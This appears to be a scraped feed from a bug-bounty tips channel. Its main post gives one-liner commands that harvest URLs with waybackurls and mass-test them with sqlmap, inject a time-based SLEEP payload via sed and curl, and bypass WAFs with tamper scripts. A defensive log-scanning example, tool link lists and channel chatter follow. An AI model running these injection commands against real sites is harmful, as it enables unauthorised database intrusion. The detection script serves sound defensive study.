Bug bounty Tips

🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

Advanced XSS.pdf (3.71 KB)

Nothing hits a man harder than realising he's growing older with zero progress in his life.


Read caption 👌👇

🔍 Bug Bounty Recon Tip: One-Liner Commands for SQL Injection

1️⃣ SQLi with sqlmap + waybackurls:
» waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"
•• Explanation:
-- waybackurls: Fetches URLs from the Wayback Machine.
-- grep: Filters URLs with query parameters and specific file types.
-- sort -u: Removes duplicates.
-- sed: Standardizes query parameters.
-- sqlmap: Automates SQL injection testing on filtered URLs.

2️⃣ Time-Based SQLi with waybackurls:
» waybackurls http://test[.]com | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt
» cat urls.txt | sed 's/=/=(CASE%20WHEN%20(888=888)%20THEN%20SLEEP(5)%20ELSE%20888%20END)/g' | xargs -I{} bash -c 'echo -e "\ntarget : {}\n" && time curl "{}"'
•• Explanation:
-- Similar steps to the first command for fetching and filtering URLs.
-- sed: Injects a time-based SQL payload.
-- curl: Sends requests to test for time-based SQL injection vulnerabilities.

3️⃣ Bypass WAF:
» sqlmap -r req.txt --risk 3 --level 3 --dbs --tamper=space2comment,space2morehash
•• Explanation:
-- sqlmap: Reads the request from req.txt.
-- --risk and --level: Sets the risk and level for SQL injection tests.
-- --tamper: Uses tamper scripts to bypass web application firewalls (WAFs).

🚀 Enhance your bug bounty toolkit with these powerful SQL injection commands! Which technique will you try first?

Remember, knowledge is power! 🔍💡 Follow for more bug bounty and ethical hacking tips and tricks, along with informative posts to keep you ahead of the game!
#RedTeam #InfoSec #CyberSecurity #EthicalHacking #KaliLinux #CyberSec #HackerLife #PenTesting #CyberThreats #NetworkSecurity #SecurityResearch #BugBounty #CyberAttack #InfoSecCommunity #HackThePlanet #OffensiveSecurity #ThreatHunting #CyberSkills #CyberAwareness #SecurityTesting #DigitalForensics #CyberProtection #sql #injection #testing https://www.instagram.com/p/C-HfLncS8A0/?igsh=MTc4MmM1YmI2Ng==
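
Seen from the defending side, the time-based probe in tip 2 leaves a recognisable trace in web server logs: the same delay expression sprayed across many parameters, with a multi-second response only where it executed. The Python sketch below is an added example, not part of the original post; the log layout, addresses, paths and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines; assumed layout: ip "request line" status seconds_taken
SAMPLE_LOG = """\
203.0.113.7 "GET /item.php?id=(CASE%20WHEN%20(888=888)%20THEN%20SLEEP(5)%20ELSE%20888%20END) HTTP/1.1" 200 5.021
203.0.113.7 "GET /news.asp?cat=(CASE%20WHEN%20(888=888)%20THEN%20SLEEP(5)%20ELSE%20888%20END) HTTP/1.1" 200 0.043
203.0.113.7 "GET /item.php?id=1/**/AND/**/SLEEP(5) HTTP/1.1" 200 5.010
198.51.100.4 "GET /item.php?id=42 HTTP/1.1" 200 0.037
198.51.100.4 "GET /blog.php?title=how+to+sleep+better HTTP/1.1" 200 0.051
"""

LINE_RE = re.compile(r'^(\S+) "(\S+) (\S+) [^"]*" (\d{3}) ([\d.]+)$')
# Delay primitives of common SQL dialects, matched only when used as SQL syntax.
DELAY_RE = re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I)
# Comment-for-space substitutions: inline /**/ and '#...newline'.
COMMENT_RE = re.compile(r"/\*.*?\*/|#[^\n]*\n", re.S)

def normalise(value):
    """Undo comment-for-space substitution so the keyword regex sees plain SQL."""
    return re.sub(r"\s+", " ", COMMENT_RE.sub(" ", value))

def scan(log_text, slow_after=4.0):
    """Return one finding per request whose parameter carries a delay call."""
    findings = []
    for line in log_text.splitlines():
        if not (m := LINE_RE.match(line)):
            continue
        ip, _method, target, _status, secs = m.groups()
        parts = urlsplit(target)
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if DELAY_RE.search(normalise(value)):
                findings.append({"ip": ip, "path": parts.path, "param": name,
                                 "delayed": float(secs) >= slow_after})
    return findings

def summarise(findings):
    """Group by client: probes sent, and which path/param actually stalled."""
    out = defaultdict(lambda: {"probes": 0, "stalled": set()})
    for f in findings:
        out[f["ip"]]["probes"] += 1
        if f["delayed"]:
            out[f["ip"]]["stalled"].add((f["path"], f["param"]))
    return dict(out)

if __name__ == "__main__":
    for ip, info in summarise(scan(SAMPLE_LOG)).items():
        print(ip, info["probes"], sorted(info["stalled"]))
```

A parameter listed under `stalled` is the one to review first: the database evaluated the injected expression, so that query is built by string concatenation and needs to be parameterised.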

⭐️Bash Scripting from Beginner to Pro⭐️
Bash scripting is an important part of process automation in Linux. Scripting helps you write a sequence of commands in a file and then execute them. This saves you time because you don't have to write certain commands again and again. You can perform daily tasks efficiently and even schedule them for automatic execution. You can also use it in developing unique solutions, automating processes
Posted by @TheGodEye

🐋Awesome Hackers Search Engines🐋
Online tools for searching info about:
- exploit
- vulnerabilities
- people
- emails
- phone numbers
- domains
- certificates
and more.
https://github.com/edoardottt/awesome-hacker-search-engines

🦋15 BEST INFORMATION GATHERING TOOLS🦋
• Network Map (nmap) - https://github.com/nmap/nmap
• Dracnmap - https://github.com/Screetsec/Dracnmap
• Xerosploit - https://github.com/LionSec/xerosploit
• RED HAWK (All In One Scanning) - https://github.com/Tuhinshubhra/RED_HAWK
• ReconSpider (For All Scanning) - https://github.com/bhavsec/reconspider
• IsItDown (Check Website Down/Up)
• Infoga - Email OSINT - https://github.com/m4ll0k/Infoga
• ReconDog - https://github.com/s0md3v/ReconDog
• Striker - https://github.com/s0md3v/Striker
• SecretFinder (like API & etc) - https://github.com/m4ll0k/SecretFinder
• Find Info Using Shodan - https://github.com/m4ll0k/Shodanfy.py
• Port Scanner - rang3r - https://github.com/floriankunushevci/rang3r
• Breacher - https://github.com/s0md3v/Breacher
Posted by @TheGodEye

Okay guys, 93%, so let's schedule a webinar on Friday. I will update with a link, and let me know which target we should try.

api-fuzzing-lists.zip (8.67 MB)

API FUZZING LISTS
Out of turn post, a very tasty collection of fuzzing wordlists for the API.
Description of this list from the author:
- 744,000+ endpoints
- 357,000+ object properties
- 211,000+ object names
- 127,000+ query parameters
- 74,000+ parameter values
- 35,000+ path parameters
- 8,300+ headers
- 5,300+ paths
- 880+ common ports

🚀CRLFsuite - CRLF injection scanner 🚀 👉 The most powerful CRLF injection (HTTP Response Splitting) scanner. 🔗 Download : https://github.com/Raghavd3v/CRLFsuite

Answer this poll; based on this I will decide.

Let's keep webinar on Friday 8pm to 10pm

But I will be available only after 8pm

Let's leave that here. Decide a day, and I will try to make a webinar and you guys can also join and let's hunt live on webinar for 1 - 2hrs

🚨 Depix 👉 It is a free and open-source tool used for image steganography, specifically for extracting hidden data from images. 🔗Download : https://github.com/spipm/Depix #bugbounty #bugbountytips

A new way to explain things via storytelling. Let me know your thoughts, guys.

🕵️‍♂️🔍 Ever wondered how your computer fetches web pages? Let's take a fun trip to the "World Wide Library" and meet Wendy the Librarian! 📚✨ She'll show you how making a request for a book is just like your computer requesting a webpage. Dive into this magical story and discover the secrets of request handling! Swipe through to become a web wizard! 🌐✨ . . . . ✔️ Share It with Your Friends. 🔗 CHECKOUT THE LINK IN BIO 🔥 Don’t miss the HIGHLIGHTS 🤔 Any queries? Don’t hesitate to DM. ❤️ LIKE, COMMENT, SHARE and SAVE the post. 👉 Follow us for more cybersecurity tips and tricks! 🌐 Visit us at www.cipherops.xyz 📲 @cipherops.tech https://www.instagram.com/p/C-ASeR-yRvP/?igsh=MTc4MmM1YmI2Ng==

I am looking for an admin who can post content and interact. Is anyone here? Anyone already running a channel is also eligible. I will make him an admin, but I have some terms and conditions.